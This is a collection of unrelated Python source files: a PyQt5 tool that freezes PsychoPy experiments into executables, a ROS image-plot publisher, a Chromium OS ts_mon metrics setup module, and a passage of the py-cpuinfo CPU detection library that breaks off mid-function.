source | python
|---|---|
psychopyfreezeapp.py
|
from PyQt5.QtWidgets import QMainWindow, QFileDialog, QLabel, QPushButton, QWidget, QMessageBox, QLineEdit
from PyQt5.QtCore import QSize
from psychopyfreezelib import PsychopyFreezeLib
import os
import threading
class PsychopyFreezeApp(QMainWindow):
def __init__(self):
QMainWindow.__init__(self)
self.setWindowTitle("Psychopy Freeze")
self.setFixedSize(QSize(400, 300))
y = 20
self.maindirLabel = QLabel(self); self.maindirLabel.move(20, y)
self.maindirLabel.setText('Path:')
self.maindirLine = QLineEdit(self); self.maindirLine.move(80, y)
self.maindirLine.resize(260, 32)
self.maindirButton = QPushButton(self); self.maindirButton.move(350, y)
self.maindirButton.setText("...")
self.maindirButton.clicked.connect(self.load_main_dir)
self.maindirButton.resize(30, 32)
y += 40
self.mainfileLabel = QLabel(self); self.mainfileLabel.move(20, y)
self.mainfileLabel.setText('Main:')
self.mainfileLine = QLineEdit(self); self.mainfileLine.move(80, y)
self.mainfileLine.resize(260, 32)
self.mainfileButton = QPushButton(self); self.mainfileButton.move(350, y)
self.mainfileButton.setText("...")
self.mainfileButton.clicked.connect(self.load_main_file)
self.mainfileButton.resize(30, 32)
y += 40
self.splashLabel = QLabel(self); self.splashLabel.move(20, y)
self.splashLabel.setText('Splash:')
self.splashLine = QLineEdit(self); self.splashLine.move(80, y)
self.splashLine.resize(260, 32)
self.splashLine.setText("SPLASH.bmp")
self.splashButton = QPushButton(self); self.splashButton.move(350, y)
self.splashButton.setText("...")
self.splashButton.clicked.connect(self.load_splash_file)
self.splashButton.resize(30, 32)
y += 40
self.NameLabel = QLabel(self); self.NameLabel.move(20, y)
self.NameLabel.setText('Name:')
self.NameLine = QLineEdit(self); self.NameLine.move(80, y)
self.NameLine.resize(300, 32)
y += 40
self.StatusLabel = QLabel(self); self.StatusLabel.move(20, y)
self.StatusLabel.setText('Status:')
self.StatusMsg = QLabel(self); self.StatusMsg.move(80, y)
self.StatusMsg.setText('Standby.')
self.StatusMsg.resize(300, 32)
y += 40
self.generateButton = QPushButton("Generate!", self)
self.generateButton.clicked.connect(self.on_click_generate)
self.generateButton.resize(300,32)
self.generateButton.move(80, y)
self.buttons = (
self.maindirButton,
self.mainfileButton,
self.splashButton,
self.generateButton
)
def raise_msg(self,msg):
e = QMessageBox()
e.setWindowTitle("Psychopy Freeze")
e.setIcon(QMessageBox.Critical)
e.setText(msg)
e.setStandardButtons(QMessageBox.Ok)
e.exec_()
def load_main_dir(self):
self.main_path = QFileDialog.getExistingDirectory(self)
if self.main_path == "": return
self.maindirLine.setText(self.main_path)
self.NameLine.setText(os.path.basename(self.main_path))
path_contents = os.listdir(self.main_path)
self.mainfileLine.setText("")
if "main.py" in path_contents:
self.mainfileLine.setText(os.path.join(self.main_path, "main.py"))
else:
self.raise_msg("No main.py detected in your experiment\n"
"Please specify the file that runs your experiment!")
if "assets" not in path_contents:
self.raise_msg( "No assets folder deteccted in your experiment.\n"
"If you use assets in your experiment,\n"
"put them in folder called \"assets\".\n")
return
def load_main_file(self):
self.main_file_path = QFileDialog.getOpenFileName(self)[0]
if self.main_file_path == "": return
if not self.main_file_path.endswith(".py"):
self.raise_msg("Invalid File Type Encountered!")
return
self.mainfileLine.setText(self.main_file_path)
def load_splash_file(self):
self.splash_path = QFileDialog.getOpenFileName(self)[0]
if self.splash_path == "": return
if not self.splash_path.lower().endswith(".bmp"):
self.raise_msg("Invalid File Type Encountered!")
return
self.splashLine.setText(self.splash_path)
def on_click_generate(self):
if "" in ( self.NameLine.text(),
self.maindirLine.text(),
self.mainfileLine.text()):
self.raise_msg("Please fill in all the fields first!")
return
self.export_dir = QFileDialog.getExistingDirectory(
self, "Where to put finished executable?")
if self.export_dir == "": return
self.export_path = os.path.join( self.export_dir,
self.NameLine.text()
if self.NameLine.text().endswith(".exe")
else (self.NameLine.text() + ".exe"))
self.gen_lib = PsychopyFreezeLib(
self.NameLine.text(),
self.maindirLine.text(),
self.mainfileLine.text(),
self.export_path,
self.splashLine.text()
)
threading.Thread(daemon=True, target=self.build).start()
def build(self):
for b in self.buttons: b.setEnabled(False)
self.StatusMsg.setText('Step (1/5) Running Pyinstaller...')
self.gen_lib.pyinstaller_build()
self.StatusMsg.setText('Step (2/5) Injecting More Resources...')
self.gen_lib.module_inject()
self.StatusMsg.setText('Step (3/5) Pruning Resources...')
self.gen_lib.prune_build()
self.StatusMsg.setText('Step (4/5) Compressing into one executable...')
self.gen_lib.NSIS_build()
self.StatusMsg.setText('Step (5/5) Cleaning Up...')
self.gen_lib.clean_build()
for b in self.buttons: b.setEnabled(True)
self.StatusMsg.setText('Standby.')
os.system("start " + self.export_dir)
|
plotter.py
|
import rospy
import numpy as np
from sensor_msgs.msg import Image
from std_srvs.srv import SetBool, SetBoolResponse
import cv2
from cv_bridge import CvBridge
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
import matplotlib
import threading
class Plotter:
'''Publishes several plots of 2d data over rostopic via Image msgs
Basic Usage Example:
# Import
from mil_ros_tools import Plotter
import numpy as np
import rospy
# ROS node
rospy.init_node('my_node')
# Create
my_plotter = Plotter('my_plotter_topic')
# Publish some plots
titles = ['random data', 'sin wave']
data_size = 100
y1 = np.random.rand(data_size)
x1 = np.arange(0, y1.shape[0])
x2 = np.linspace(0, 5, data_size)
y2 = np.sin(x2)
plots = np.vstack((x1, y1, x2, y2))
my_plotter.publish_plots(plots, titles)
For another usage example see `mil_passive_sonar triggering`
Limitations:
can only stack plots vertically
all plots must have same number of points
cannot name axes
Publishing happens in another thread;
if publish_plots is called before a previous publish_plots call finishes,
the most recent publish_plots call will be ignored
cannot plot multiple data sets on top of each other in the same plot
cannot change color of plots
Features:
Can be enabled/disabled via the <topic_name>_enable service call
'''
def __init__(self, topic_name, w=20, h=20, dpi=150):
matplotlib.rcParams.update({'font.size': 22})
self.pub = rospy.Publisher(topic_name, Image, queue_size=1)
self.bridge = CvBridge()
self.fig = Figure(figsize=(w,h), dpi=dpi)
self.canvas = FigureCanvasAgg(self.fig)
self.enabled = True
self.thread = None
rospy.Service(('%s_enable'%topic_name), SetBool, self.enable_disable)
def enable_disable(self, req):
self.enabled = req.data
return SetBoolResponse(success=True)
def is_go(self):
return self.enabled and\
self.pub.get_num_connections() > 0 and\
(self.thread is None or not self.thread.is_alive())
def publish_plots(self, plots, titles=[], v_lines=[]):
if self.is_go():
self.thread = threading.Thread(target=self.publish_plots_, args=(plots,titles, v_lines))
self.thread.daemon = True
self.thread.start()
def publish_plots_(self, plots, titles=[], v_lines=[]):
num_of_plots = plots.shape[0]/2
for i in xrange(1, num_of_plots+1):
self.fig.add_subplot(num_of_plots, 1, i)
for i, ax in enumerate(self.fig.axes):
ax.plot(plots[i*2,:], plots[i*2+1,:])
if i < len(titles):
ax.set_title(titles[i])
if i < len(v_lines):
ax.axvline(v_lines[i])
self.canvas.draw()
s, (w, h) = self.canvas.print_to_buffer()
self.fig.clf()
img = np.fromstring(s, np.uint8).reshape(w, h, 4)
img = np.roll(img, 3, axis = 2)
for ax in self.fig.axes: ax.cla()
# make ros msg of the img
msg = self.bridge.cv2_to_imgmsg(img, encoding='passthrough')
# publish the image
self.pub.publish(msg)
def interweave(x, data):
'''Helper function to place a single x axis in every other row of a data matrix
x must be a numpy array of shape (samples,)
data must be a numpy ndarray of shape (channels, samples)
returns:
numpy ndarray of shape (channels*2, samples) where
even numbered rows are x, odd rows are the data
see mil_passive_sonar triggering for an example
'''
plots = [None] * data.shape[0]
for i in xrange(data.shape[0]):
plots[i] = np.vstack((x, data[i,:]))
plots = np.vstack(tuple(plots))
return plots
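# Illustrative sketch (added; not in the original file): feeding interweave's output
# into Plotter.publish_plots, assuming a ROS node is already initialised.
#   x = np.linspace(0, 1, 200)                    # shared x axis, shape (samples,)
#   data = np.vstack((np.sin(x), np.cos(x)))      # shape (channels, samples)
#   plots = interweave(x, data)                   # shape (channels * 2, samples)
#   my_plotter = Plotter('my_plotter_topic')      # topic name is illustrative
#   my_plotter.publish_plots(plots, titles=['sin', 'cos'])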
|
ts_mon_config.py
|
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Wrapper for inframon's command-line flag based configuration."""
from __future__ import print_function
import argparse
import contextlib
import multiprocessing
import os
import socket
import signal
import time
import Queue
from chromite.lib import cros_logging as logging
from chromite.lib import metrics
from chromite.lib import parallel
try:
from infra_libs.ts_mon import config
import googleapiclient.discovery
except (ImportError, RuntimeError) as e:
config = None
logging.warning('Failed to import ts_mon, monitoring is disabled: %s', e)
_WasSetup = False
FLUSH_INTERVAL = 60
@contextlib.contextmanager
def TrivialContextManager():
"""Context manager with no side effects."""
yield
def SetupTsMonGlobalState(service_name,
short_lived=False,
indirect=False,
auto_flush=True):
"""Uses a dummy argument parser to get the default behavior from ts-mon.
Args:
service_name: The name of the task we are sending metrics from.
short_lived: Whether this process is short-lived and should use the autogen
hostname prefix.
indirect: Whether to create a metrics.MESSAGE_QUEUE object and a separate
process for indirect metrics flushing. Useful for forking,
because forking would normally create a duplicate ts_mon thread.
auto_flush: Whether to create a thread to automatically flush metrics every
minute.
"""
global _WasSetup
if not config:
return TrivialContextManager()
if indirect:
return _CreateTsMonFlushingProcess([service_name],
{'short_lived': short_lived})
# google-api-client has too much noisy logging.
googleapiclient.discovery.logger.setLevel(logging.WARNING)
parser = argparse.ArgumentParser()
config.add_argparse_options(parser)
args = [
'--ts-mon-target-type', 'task',
'--ts-mon-task-service-name', service_name,
'--ts-mon-task-job-name', service_name,
]
# Short lived processes will have autogen: prepended to their hostname and
# use task-number=PID to trigger shorter retention policies under
# chrome-infra@, and used by a Monarch precomputation to group across the
# task number.
# Furthermore, we assume they manually call ts_mon.flush(), because the
# ts_mon thread will drop messages if the process exits before it flushes.
if short_lived:
auto_flush = False
fqdn = socket.getfqdn().lower()
host = fqdn.split('.')[0]
args.extend(['--ts-mon-task-hostname', 'autogen:' + host,
'--ts-mon-task-number', str(os.getpid())])
args.extend(['--ts-mon-flush', 'auto' if auto_flush else 'manual'])
try:
config.process_argparse_options(parser.parse_args(args=args))
logging.notice('ts_mon was set up.')
_WasSetup = True
except Exception as e:
logging.warning('Failed to configure ts_mon, monitoring is disabled: %s', e,
exc_info=True)
return TrivialContextManager()
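# Illustrative usage (added; 'my_service' is a placeholder name, not from this module):
#   SetupTsMonGlobalState('my_service')                      # direct setup in this process
#   with SetupTsMonGlobalState('my_service', indirect=True):
#     ...  # forked workers enqueue metrics on metrics.MESSAGE_QUEUE for the flusher process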
@contextlib.contextmanager
def _CreateTsMonFlushingProcess(setup_args, setup_kwargs):
"""Creates a separate process to flush ts_mon metrics.
Useful for multiprocessing scenarios where we don't want multiple ts-mon
threads sending contradictory metrics. Instead, functions in
chromite.lib.metrics will send their calls to a Queue, which is consumed by a
dedicated flushing process.
Args:
setup_args: Arguments sent to SetupTsMonGlobalState in the child process
setup_kwargs: Keyword arguments sent to SetupTsMonGlobalState in the child
process
Side effects:
Sets chromite.lib.metrics.MESSAGE_QUEUE, which causes the metric functions
to send their calls to the Queue instead of creating the metrics.
"""
# If this is nested, we don't need to create another queue and another
# message consumer. Do nothing to continue to use the existing queue.
if metrics.MESSAGE_QUEUE:
return
with parallel.Manager() as manager:
message_q = manager.Queue()
p = multiprocessing.Process(
target=lambda: _ConsumeMessages(message_q, setup_args, setup_kwargs))
p.start()
# this makes the chromite.lib.metric functions use the queue.
# note - we have to do this *after* forking the ConsumeMessages process.
metrics.MESSAGE_QUEUE = message_q
try:
yield message_q
finally:
message_q.put(None)
logging.info("Waiting for ts_mon flushing process to finish...")
p.join(timeout=FLUSH_INTERVAL*2)
if p.is_alive():
p.terminate()
if p.exitcode:
logging.warning("ts_mon_config flushing process did not exit cleanly.")
def _WaitToFlush(last_flush):
"""Sleeps until the next time we can call metrics.flush(), then flushes.
Args:
last_flush: timestamp of the last flush
"""
time_delta = time.time() - last_flush
time.sleep(max(0, FLUSH_INTERVAL - time_delta))
metrics.flush()
def _FlushIfReady(pending, last_flush):
"""Call metrics.flush() if we are ready and have pending metrics.
This allows us to only call flush every FLUSH_INTERVAL seconds.
Args:
pending: bool indicating whether there are pending metrics to flush.
last_flush: time stamp of the last time flush() was called.
"""
now = time.time()
time_delta = now - last_flush
if time_delta > FLUSH_INTERVAL and pending:
last_flush = now
time_delta = 0
metrics.flush()
pending = False
else:
pending = True
return pending, last_flush, time_delta
def _MethodCallRepr(obj, method, args, kwargs):
"""Gives a string representation of |obj|.|method|(*|args|, **|kwargs|)
Args:
obj: An object
method: A method name
args: A list of arguments
kwargs: A dict of keyword arguments
"""
args_strings = (map(repr, args) +
[(str(k) + '=' + repr(v))
for (k, v) in kwargs.iteritems()])
return '%s.%s(%s)' % (repr(obj), method, ', '.join(args_strings))
def _ConsumeMessages(message_q, setup_args, setup_kwargs):
"""Configures ts_mon and gets metrics from a message queue.
Args:
message_q: A multiprocessing.Queue to read metrics from.
setup_args: Arguments to pass to SetupTsMonGlobalState.
setup_kwargs: Keyword arguments to pass to SetupTsMonGlobalState.
"""
# Configure ts-mon, but don't start up a sending thread.
setup_kwargs['auto_flush'] = False
SetupTsMonGlobalState(*setup_args, **setup_kwargs)
last_flush = 0
pending = False
# If our parent dies, finish flushing before exiting.
parallel.ExitWithParent(signal.SIGHUP)
signal.signal(signal.SIGHUP, lambda _sig, _stack: _WaitToFlush(last_flush))
message = message_q.get()
while message:
metric, func, f_args, f_kwargs = message
try:
getattr(metric, func)(*f_args, **f_kwargs)
except Exception:
logging.exception('Caught an exception while running %s',
_MethodCallRepr(metric, func, f_args, f_kwargs))
pending, last_flush, time_delta = _FlushIfReady(True, last_flush)
try:
# Only wait until the next flush time if we have pending metrics.
timeout = FLUSH_INTERVAL - time_delta if pending else None
message = message_q.get(timeout=timeout)
except Queue.Empty:
# We had pending metrics, but we didn't get a new message. Flush and wait
# indefinitely.
pending, last_flush, _ = _FlushIfReady(pending, last_flush)
# Wait as long as we need to for the next metric.
message = message_q.get()
if pending:
_WaitToFlush(last_flush)
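# Note (added for clarity): each queue entry is a (metric, method_name, args, kwargs)
# tuple applied as getattr(metric, method_name)(*args, **kwargs); a None entry (see
# _CreateTsMonFlushingProcess) ends the consumer loop and triggers a final flush.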
|
cpuinfo.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright (c) 2014-2019, Matthew Brennan Jones <matthew.brennan.jones@gmail.com>
# Py-cpuinfo gets CPU info with pure Python 2 & 3
# It uses the MIT License
# It is hosted at: https://github.com/workhorsy/py-cpuinfo
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
CPUINFO_VERSION = (5, 0, 0)
CPUINFO_VERSION_STRING = '.'.join([str(n) for n in CPUINFO_VERSION])
import os, sys
import platform
import multiprocessing
import ctypes
try:
import _winreg as winreg
except ImportError as err:
try:
import winreg
except ImportError as err:
pass
IS_PY2 = sys.version_info[0] == 2
CAN_CALL_CPUID_IN_SUBPROCESS = True
class DataSource(object):
bits = platform.architecture()[0]
cpu_count = multiprocessing.cpu_count()
is_windows = platform.system().lower() == 'windows'
arch_string_raw = platform.machine()
uname_string_raw = platform.uname()[5]
can_cpuid = True
@staticmethod
def has_proc_cpuinfo():
return os.path.exists('/proc/cpuinfo')
@staticmethod
def has_dmesg():
return len(_program_paths('dmesg')) > 0
@staticmethod
def has_var_run_dmesg_boot():
uname = platform.system().strip().strip('"').strip("'").strip().lower()
return 'linux' in uname and os.path.exists('/var/run/dmesg.boot')
@staticmethod
def has_cpufreq_info():
return len(_program_paths('cpufreq-info')) > 0
@staticmethod
def has_sestatus():
return len(_program_paths('sestatus')) > 0
@staticmethod
def has_sysctl():
return len(_program_paths('sysctl')) > 0
@staticmethod
def has_isainfo():
return len(_program_paths('isainfo')) > 0
@staticmethod
def has_kstat():
return len(_program_paths('kstat')) > 0
@staticmethod
def has_sysinfo():
return len(_program_paths('sysinfo')) > 0
@staticmethod
def has_lscpu():
return len(_program_paths('lscpu')) > 0
@staticmethod
def has_ibm_pa_features():
return len(_program_paths('lsprop')) > 0
@staticmethod
def has_wmic():
returncode, output = _run_and_get_stdout(['wmic', 'os', 'get', 'Version'])
return returncode == 0 and len(output) > 0
@staticmethod
def cat_proc_cpuinfo():
return _run_and_get_stdout(['cat', '/proc/cpuinfo'])
@staticmethod
def cpufreq_info():
return _run_and_get_stdout(['cpufreq-info'])
@staticmethod
def sestatus_b():
return _run_and_get_stdout(['sestatus', '-b'])
@staticmethod
def dmesg_a():
return _run_and_get_stdout(['dmesg', '-a'])
@staticmethod
def cat_var_run_dmesg_boot():
return _run_and_get_stdout(['cat', '/var/run/dmesg.boot'])
@staticmethod
def sysctl_machdep_cpu_hw_cpufrequency():
return _run_and_get_stdout(['sysctl', 'machdep.cpu', 'hw.cpufrequency'])
@staticmethod
def isainfo_vb():
return _run_and_get_stdout(['isainfo', '-vb'])
@staticmethod
def kstat_m_cpu_info():
return _run_and_get_stdout(['kstat', '-m', 'cpu_info'])
@staticmethod
def sysinfo_cpu():
return _run_and_get_stdout(['sysinfo', '-cpu'])
@staticmethod
def lscpu():
return _run_and_get_stdout(['lscpu'])
@staticmethod
def ibm_pa_features():
import glob
ibm_features = glob.glob('/proc/device-tree/cpus/*/ibm,pa-features')
if ibm_features:
return _run_and_get_stdout(['lsprop', ibm_features[0]])
@staticmethod
def wmic_cpu():
return _run_and_get_stdout(['wmic', 'cpu', 'get', 'Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer', '/format:list'])
@staticmethod
def winreg_processor_brand():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
processor_brand = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
return processor_brand.strip()
@staticmethod
def winreg_vendor_id_raw():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
vendor_id_raw = winreg.QueryValueEx(key, "VendorIdentifier")[0]
winreg.CloseKey(key)
return vendor_id_raw
@staticmethod
def winreg_arch_string_raw():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Session Manager\Environment")
arch_string_raw = winreg.QueryValueEx(key, "PROCESSOR_ARCHITECTURE")[0]
winreg.CloseKey(key)
return arch_string_raw
@staticmethod
def winreg_hz_actual():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
hz_actual = winreg.QueryValueEx(key, "~Mhz")[0]
winreg.CloseKey(key)
hz_actual = _to_decimal_string(hz_actual)
return hz_actual
@staticmethod
def winreg_feature_bits():
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
feature_bits = winreg.QueryValueEx(key, "FeatureSet")[0]
winreg.CloseKey(key)
return feature_bits
def _program_paths(program_name):
paths = []
exts = list(filter(None, os.environ.get('PATHEXT', '').split(os.pathsep)))
path = os.environ['PATH']
for p in os.environ['PATH'].split(os.pathsep):
p = os.path.join(p, program_name)
if os.access(p, os.X_OK):
paths.append(p)
for e in exts:
pext = p + e
if os.access(pext, os.X_OK):
paths.append(pext)
return paths
def _run_and_get_stdout(command, pipe_command=None):
from subprocess import Popen, PIPE
if not pipe_command:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
output = p1.communicate()[0]
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return p1.returncode, output
else:
p1 = Popen(command, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p2 = Popen(pipe_command, stdin=p1.stdout, stdout=PIPE, stderr=PIPE)
p1.stdout.close()
output = p2.communicate()[0]
if not IS_PY2:
output = output.decode(encoding='UTF-8')
return p2.returncode, output
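# Illustrative example (added): _run_and_get_stdout(['lscpu']) returns a
# (returncode, stdout_text) tuple; passing pipe_command pipes the first command's
# stdout into the second, e.g. _run_and_get_stdout(['dmesg'], ['grep', 'CPU']).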
# Make sure we are running on a supported system
def _check_arch():
arch, bits = _parse_arch(DataSource.arch_string_raw)
if not arch in ['X86_32', 'X86_64', 'ARM_7', 'ARM_8', 'PPC_64', 'S390X']:
raise Exception("py-cpuinfo currently only works on X86 and some ARM/PPC/S390X CPUs.")
def _obj_to_b64(thing):
import pickle
import base64
a = thing
b = pickle.dumps(a)
c = base64.b64encode(b)
d = c.decode('utf8')
return d
def _b64_to_obj(thing):
import pickle
import base64
try:
a = base64.b64decode(thing)
b = pickle.loads(a)
return b
except:
return {}
def _utf_to_str(input):
if IS_PY2 and isinstance(input, unicode):
return input.encode('utf-8')
elif isinstance(input, list):
return [_utf_to_str(element) for element in input]
elif isinstance(input, dict):
return {_utf_to_str(key): _utf_to_str(value)
for key, value in input.items()}
else:
return input
def _copy_new_fields(info, new_info):
keys = [
'vendor_id_raw', 'hardware_raw', 'brand_raw', 'hz_advertised_friendly', 'hz_actual_friendly',
'hz_advertised', 'hz_actual', 'arch', 'bits', 'count',
'arch_string_raw', 'uname_string_raw',
'l2_cache_size', 'l2_cache_line_size', 'l2_cache_associativity',
'stepping', 'model', 'family',
'processor_type', 'extended_model', 'extended_family', 'flags',
'l3_cache_size', 'l1_data_cache_size', 'l1_instruction_cache_size'
]
for key in keys:
if new_info.get(key, None) and not info.get(key, None):
info[key] = new_info[key]
elif key == 'flags' and new_info.get('flags'):
for f in new_info['flags']:
if f not in info['flags']: info['flags'].append(f)
info['flags'].sort()
def _get_field_actual(cant_be_number, raw_string, field_names):
for line in raw_string.splitlines():
for field_name in field_names:
field_name = field_name.lower()
if ':' in line:
left, right = line.split(':', 1)
left = left.strip().lower()
right = right.strip()
if left == field_name and len(right) > 0:
if cant_be_number:
if not right.isdigit():
return right
else:
return right
return None
def _get_field(cant_be_number, raw_string, convert_to, default_value, *field_names):
retval = _get_field_actual(cant_be_number, raw_string, field_names)
# Convert the return value
if retval and convert_to:
try:
retval = convert_to(retval)
except:
retval = default_value
# Return the default if there is no return value
if retval is None:
retval = default_value
return retval
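# Illustrative example (added): on /proc/cpuinfo-style text,
#   _get_field(False, "model name\t: Intel CPU\nstepping\t: 9", None, '', 'model name')
# returns 'Intel CPU'; a field that is missing falls back to the default value ''.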
def _to_decimal_string(ticks):
try:
# Convert to string
ticks = '{0}'.format(ticks)
# Strip off non numbers and decimal places
ticks = "".join(n for n in ticks if n.isdigit() or n=='.').strip()
if ticks == '':
ticks = '0'
# Add decimal if missing
if '.' not in ticks:
ticks = '{0}.0'.format(ticks)
# Remove trailing zeros
ticks = ticks.rstrip('0')
# Add one trailing zero for empty right side
if ticks.endswith('.'):
ticks = '{0}0'.format(ticks)
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
return ticks
except:
return '0.0'
def _hz_short_to_full(ticks, scale):
try:
# Make sure the number can be converted to a float
ticks = float(ticks)
ticks = '{0}'.format(ticks)
# Scale the numbers
hz = ticks.lstrip('0')
old_index = hz.index('.')
hz = hz.replace('.', '')
hz = hz.ljust(scale + old_index+1, '0')
new_index = old_index + scale
hz = '{0}.{1}'.format(hz[:new_index], hz[new_index:])
left, right = hz.split('.')
left, right = int(left), int(right)
return (left, right)
except:
return (0, 0)
def _hz_friendly_to_full(hz_string):
try:
hz_string = hz_string.strip().lower()
hz, scale = (None, None)
if hz_string.endswith('ghz'):
scale = 9
elif hz_string.endswith('mhz'):
scale = 6
elif hz_string.endswith('hz'):
scale = 0
hz = "".join(n for n in hz_string if n.isdigit() or n=='.').strip()
if not '.' in hz:
hz += '.0'
hz, scale = _hz_short_to_full(hz, scale)
return (hz, scale)
except:
return (0, 0)
def _hz_short_to_friendly(ticks, scale):
try:
# Get the raw Hz as a string
left, right = _hz_short_to_full(ticks, scale)
result = '{0}.{1}'.format(left, right)
# Get the location of the dot, and remove said dot
dot_index = result.index('.')
result = result.replace('.', '')
# Get the Hz symbol and scale
symbol = "Hz"
scale = 0
if dot_index > 9:
symbol = "GHz"
scale = 9
elif dot_index > 6:
symbol = "MHz"
scale = 6
elif dot_index > 3:
symbol = "KHz"
scale = 3
# Get the Hz with the dot at the new scaled point
result = '{0}.{1}'.format(result[:-scale-1], result[-scale-1:])
# Format the ticks to have 4 numbers after the decimal
# and remove any superfluous zeroes.
result = '{0:.4f} {1}'.format(float(result), symbol)
result = result.rstrip('0')
return result
except:
return '0.0000 Hz'
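# Worked example (added): a brand string advertising "2.80GHz" yields ticks='2.8',
# scale=9, so _hz_short_to_full('2.8', 9) -> (2800000000, 0) and
# _hz_short_to_friendly('2.8', 9) -> '2.8000 GHz'.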
def _to_friendly_bytes(input):
import re
if not input:
return input
input = "{0}".format(input)
formats = {
r"^[0-9]+B$" : 'B',
r"^[0-9]+K$" : 'KB',
r"^[0-9]+M$" : 'MB',
r"^[0-9]+G$" : 'GB'
}
for pattern, friendly_size in formats.items():
if re.match(pattern, input):
return "{0} {1}".format(input[ : -1].strip(), friendly_size)
return input
def _parse_cpu_brand_string(cpu_string):
# Just return 0 if the processor brand does not have the Hz
if not 'hz' in cpu_string.lower():
return ('0.0', 0)
hz = cpu_string.lower()
scale = 0
if hz.endswith('mhz'):
scale = 6
elif hz.endswith('ghz'):
scale = 9
if '@' in hz:
hz = hz.split('@')[1]
else:
hz = hz.rsplit(None, 1)[1]
hz = hz.rstrip('mhz').rstrip('ghz').strip()
hz = _to_decimal_string(hz)
return (hz, scale)
def _parse_cpu_brand_string_dx(cpu_string):
import re
# Find all the strings inside brackets ()
starts = [m.start() for m in re.finditer('\(', cpu_string)]
ends = [m.start() for m in re.finditer('\)', cpu_string)]
insides = {k: v for k, v in zip(starts, ends)}
insides = [cpu_string[start+1 : end] for start, end in insides.items()]
# Find all the fields
vendor_id, stepping, model, family = (None, None, None, None)
for inside in insides:
for pair in inside.split(','):
pair = [n.strip() for n in pair.split(':')]
if len(pair) > 1:
name, value = pair[0], pair[1]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Find the Processor Brand
# Strip off extra strings in brackets at end
brand = cpu_string.strip()
is_working = True
while is_working:
is_working = False
for inside in insides:
full = "({0})".format(inside)
if brand.endswith(full):
brand = brand[ :-len(full)].strip()
is_working = True
# Find the Hz in the brand string
hz_brand, scale = _parse_cpu_brand_string(brand)
# Find Hz inside brackets () after the brand string
if hz_brand == '0.0':
for inside in insides:
hz = inside
for entry in ['GHz', 'MHz', 'Hz']:
if entry in hz:
hz = "CPU @ " + hz[ : hz.find(entry) + len(entry)]
hz_brand, scale = _parse_cpu_brand_string(hz)
break
return (hz_brand, scale, brand, vendor_id, stepping, model, family)
def _parse_dmesg_output(output):
try:
# Get all the dmesg lines that might contain a CPU string
lines = output.split(' CPU0:')[1:] + \
output.split(' CPU1:')[1:] + \
output.split(' CPU:')[1:] + \
output.split('\nCPU0:')[1:] + \
output.split('\nCPU1:')[1:] + \
output.split('\nCPU:')[1:]
lines = [l.split('\n')[0].strip() for l in lines]
# Convert the lines to CPU strings
cpu_strings = [_parse_cpu_brand_string_dx(l) for l in lines]
# Find the CPU string that has the most fields
best_string = None
highest_count = 0
for cpu_string in cpu_strings:
count = sum([n is not None for n in cpu_string])
if count > highest_count:
highest_count = count
best_string = cpu_string
# If no CPU string was found, return {}
if not best_string:
return {}
hz_actual, scale, processor_brand, vendor_id, stepping, model, family = best_string
# Origin
if ' Origin=' in output:
fields = output[output.find(' Origin=') : ].split('\n')[0]
fields = fields.strip().split()
fields = [n.strip().split('=') for n in fields]
fields = [{n[0].strip().lower() : n[1].strip()} for n in fields]
for field in fields:
name = list(field.keys())[0]
value = list(field.values())[0]
if name == 'origin':
vendor_id = value.strip('"')
elif name == 'stepping':
stepping = int(value.lstrip('0x'), 16)
elif name == 'model':
model = int(value.lstrip('0x'), 16)
elif name in ['fam', 'family']:
family = int(value.lstrip('0x'), 16)
# Features
flag_lines = []
for category in [' Features=', ' Features2=', ' AMD Features=', ' AMD Features2=']:
if category in output:
flag_lines.append(output.split(category)[1].split('\n')[0])
flags = []
for line in flag_lines:
line = line.split('<')[1].split('>')[0].lower()
for flag in line.split(','):
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
hz_advertised, scale = _parse_cpu_brand_string(processor_brand)
# If advertised hz not found, use the actual hz
if hz_advertised == '0.0':
scale = 6
hz_advertised = _to_decimal_string(hz_actual)
info = {
'vendor_id_raw' : vendor_id,
'brand_raw' : processor_brand,
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
if hz_advertised and hz_advertised != '0.0':
